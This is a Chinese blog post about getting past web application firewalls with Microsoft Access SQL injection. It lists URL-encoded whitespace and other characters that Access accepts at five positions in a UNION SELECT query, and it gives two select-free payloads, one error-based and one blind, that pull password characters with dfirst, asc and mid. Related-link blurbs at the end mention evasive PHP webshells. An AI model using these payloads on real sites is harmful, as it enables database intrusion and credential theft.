WAF Bypass数据库特性(Access探索篇)

已于 2023-04-29 18:23:12 修改
阅读量406 收藏 1
点赞数
文章标签: 数据库 sql
于 2017-07-03 11:15:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_23936389/article/details/86177069
版权

​​​​​​​WAF Bypass数据库特性(Access探索篇)

0x01 背景

无聊,测试了一下access特性

0x02 测试

常见有5个位置即:select * from admin where id=1【位置一】union【位置二】select【位置三】1,2,db_name()【位置四】from【位置五】admin

位置一:参数和union之间的位置

(1)空白字符

Access可以利用的空白字符有:%09、%0a、%0c、%0d、%16

(2)%3b

位置二:union和select之间的位置

(1)空白字符

Access可以利用的空白字符有:%09、%0a、%0c、%0d

位置三:select和查询参数之间的位置

(1)空白字符

Access可以利用的空白字符有:%09、%0a、%0c、%0d

(2)其他字符

%2b、%2d、%2e、%3d

位置四:查询参数和from之间的位置

(1)空白字符

Access可以利用的空白字符有:%09、%0a、%0c、%0d

位置五:from后面的位置

(1)空白字符

Access可以利用的空白字符有:%09、%0a、%0c、%0d

0x03 技巧

ACCESS无select SQL注射

1 、需要报错


select * from idea_user where id=3+(dfirst([password],([idea_user]![password])))

2、盲注


select * from idea_user where id=3+asc(mid((dfirst("[password]","[idea_user]")),1,1))-101

password字段第一个字符为e,对应ascii为101,所以id=3+101-101 还是等于3,页面返回正常

最后

欢迎关注个人微信公众号:Bypass--,每周原创一篇技术干货。 

  

参考文章:

ACCESS无select SQL注射  http://www.5kik.com/aspnews/597.html

posted @ 2017-07-03 11:15 Bypass 阅读(...) 评论(...) 编辑 收藏
Bypass--
关注
专栏目录
数据库语法整理及WAF绕过方式
RuoLi_s的博客
09-30 2384
关系型数据库 关系型数据库:指采用了关系模型来组织数据的数据库。 直白的说就是:关系型数据库最典型的数据结构是表,由二维表及其之间的联系所组成的一个数据组织 当今主流的关系型数据库有:Oracle,Microsoft SQL Server,MySQL,PostgreSQL,DB2, Microsoft AccessSQLite,MariaDB Oracle Oracle特性: select id,contents,time from news where news_id=1 ① union ② sele
mysql注入fuzz字典_sql注入fuzz bypass waf
weixin_30467861的博客
01-28 803
本帖最后由 xmidf 于 2018-7-11 10:16 编辑作者:whynot 转自:先知0x0 前言这里是简单对sql注入绕过waf的一个小总结,非安全研究员,这里不讲原理,关于原理搜集了一些其他大佬的文章(文章在最下面请自取),感谢他们的分享,比着葫芦画瓢,对着各大waf厂商跟着师傅们来一波实战,进行一个简单的总结。0x1 注入点检测一般的注入还是很好判断的,特别是基于报错,但有...
SQL注入WAF小结
05-08
自己总结SQL注入WAF小结,有人能指点指点就更好啦。。
nginx不记录特定日志(access_log_bypass_if)
weixin_34262482的博客
12-06 762
为什么80%的码农都做不了架构师?>>> ...
Php309,GitHub - xiaoq190309/S9MF-php-webshell-bypass: 为方便WAF入库的项目 | 分享PHP免杀大马 | 菜是原罪 | 多姿势(假的就一个)...
weixin_30999669的博客
03-22 474
S9MF-php-webshell-bypass为方便WAF入库的项目 | 分享PHP免杀大马 | 菜是原罪 | 多姿势(假的就一个)前言webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。又分大马和小马,大马就是功能比较多的,而小马更像一句话,本文介绍的是免杀PHP大马。声明项目脚本仅供学习交流请勿用于非法用途。本文测试的免杀...
Github标星5.2k+!开源、强大的WAF(web防火墙)VeryNginx!
民工哥的博客
03-08 2231
「读者福利!2 TB 各类技术资源免费赠送」之前工作中经常在 Nginx 里面配置各种规则,感觉 Nginx 功能强大但并不是很易用。于是就觉得可以写一个强大而且对人类友好的 Ngi...
WAF Bypass数据库特性(Mysql探索
07-02 450
0x01 背景 Mysql数据库特性探索探索能够绕过WAF数据库特性。 0x02 测试 常见有5个位置即: SELECT * FROM admin WHERE username = 1【位置一】union【位置二】select【位置三】1,user()【位置四】from【位置五】admin 位置一:参数和union之间的位置 (1): 常见形式%20、/**/、/*!5...
那些可以绕过WAF的各种特性
热门推荐
03-23 2万+
我们一般将安全防护软件划分为:云WAF、硬件waf、主机防护软件、软件waf等。在攻防实战中,往往需要掌握一些特性,比如服务器、数据库、应用层、WAF层...
WAF Bypass数据库特性Access探索).pdf
04-22
### WAF Bypass数据库特性Access探索) #### 0x01 前言 在网络安全领域,尤其是渗透测试过程中,WAF(Web Application Firewall)作为一道重要的安全防线,经常被用于防止各种针对Web应用的攻击行为。然而,对于...
第04WAF Bypass数据库特性Access探索)1
08-03
(1)空白字符 (1)空白字符 (1)空白字符 (2)其他字符 (1)空白字符 (1)空白字符
WAF攻防实战笔记v1.0--Bypass.pdf
03-30
4. **Access数据库特性**:分析了Access数据库中的特性及其在绕过WAF中的应用。 ### 实战 实战详细介绍了如何在实际攻击中应用上述技术来绕过不同厂商的WAF: 1. **绕过D盾_IIS防火墙**:介绍了如何利用各种...
Percona发布开源DBaaS平台;阿里云RDS发布全球多活数据库(GAD);Redshift支持自然语言生成SQL
云原生智能数据管理平台
09-20 972
RDS MySQL全面升级了全球多活数据库(简称GAD)产品,GAD基于RDS与DTS产品打造,融合了灾备与多活两大能力,作为一站式、高性价比的灾备与多活解决方案,为用户提供全面的灾备和多活数据库服务。,产品基于RDS与DTS实现,为用户提供一站式、高性价比的灾备与多活解决方案 ([5])。此外,RDS MySQL还发布了列加密([6]),集群版新增库表恢复等功能([4])。Redis 4.0及以上版本的单机、主备、读写分离、Proxy集群实例,支持通过ELB实现Redis公网访问 ( [25] )
计算机毕业设计之:基于微信小程序的诗词智能学习系统(源码+文档+解答)
程序员阿龙的博客
09-22 4253
博主介绍: ✌我是阿龙,一名专注于Java技术领域的程序员,全网拥有10W+粉丝。作为CSDN特邀作者、博客专家、新星计划导师,我在计算机毕业设计开发方面积累了丰富的经验。同时,我也是掘金、华为云、阿里云、InfoQ等平台的优质作者。通过长期分享和实战指导,我致力于帮助更多学生完成毕业项目和技术提升。 技术范围: 我熟悉的技术领域涵盖SpringBoot、Vue、SSM、HLMT、Jsp、PHP、Nodejs、Python、爬虫、数据可视化、小程序、安卓app、大数据、物联网、机器学习等方
Online DDL (Data Definition Language)
09-23 239
是MySQL中的一个功能,允许在修改表结构(如添加、删除或修改列)的同时,允许对表进行并发读写操作。在传统的DDL操作中,对表结构的修改会导致整个表被锁定,从而阻止其他事务对该表进行读写操作,这可能导致长时间的锁定和性能问题。Online DDL的引入解决了这个问题,它允许在修改表结构的同时,保持对表的并发访问。MySQL从5.6版本开始引入了Online DDL的部分功能,而在8.0版本中对Online DDL进行了进一步的优化。
MySQL数据库的增删改查以及基本操作分享
m0_57094953的博客
09-21 450
MySQL数据库基本操作分享,包括增删改查,登录退出,查看数据库、表等
Java Alibaba Druid 数据库连接池
miracle的专栏
09-24 575
在Java开发中,数据库连接池是性能优化的重要一环。而作为一款强大的数据库连接池解决方案,凭借其和对多种数据库的支持,成为了许多企业级应用的首选。本文章将介绍Druid的核心特性,并结合不同数据库的实际用法。
JPA+Thymeleaf增删改查
最新发布
y050505的博客
09-25 343
在使用JPA(Java Persistence API)和Thymeleaf作为模板引擎进行Web开发时,实现增删改查(CRUD)操作是一个常见的需求。下面,我将简要介绍如何使用Spring Boot框架结合JPA和Thymeleaf来实现这一功能。
阿里1688一面总结
weixin_44804108的博客
09-19 703
发布-订阅模式,即当实验发生变更时,就发出一个变更事件,然后,每台机器感知到这个变更事件后,清空本地缓存,触发reload操作。为了避免大量请求打到DB,可以对查询请求进行加锁,保证相同的实验只有一个线程去查,然后更新到缓存中,其他的请求,走缓存查询结果。运维团队将扩缩容事件投递在kafka中,容量平台起一个线程去订阅变更事件,当有事件时,更新公共缓存中的数据。kafka单broker的消息是可以保证顺序性的,但是kafka集群的消息实际是无序的。首先,面试官进行对业务进行介绍,然后,候选人进行自我介绍。
MSSQL数据库特性WAF Bypass探索
在MSSQL数据库中,WAF Bypass可以通过利用一些数据库特性来实现。首先,我们可以使用不同的空白字符,如ASCII码中的01到0F、20等,这些字符在某些情况下可能不会被WAF识别,从而达到绕过的效果。此外,MSSQL还支持/*...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Bypass--

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值